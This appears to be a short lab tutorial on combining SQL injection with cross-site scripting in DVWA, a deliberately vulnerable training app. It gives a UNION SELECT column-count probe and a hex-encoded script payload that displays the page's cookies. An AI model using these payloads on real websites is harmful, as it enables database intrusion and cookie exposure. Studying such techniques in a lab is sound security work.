How to Exploit compound sql injection (sql injection with xss)
Here I am using DVWA to show the real time example of sql injection with XSS I am using a simple java script i.e. <script>alert(document.cookie)</script> So open your DVWA and go to the sql injection tab. To find the number of columns pass this string ' UNION SELECT 1,2 -- and got the result like this Here in the above screenshot it is showing the two columns. Now I will try to inject xss script into sql query. Here I am using script <script>alert(document.cookie)</script> and hex encoded value of this script is 0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293C2F7363726970743E. So the payload will be ' UNION SELECT 1, 0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293C2F7363726970743E -- Thanks ...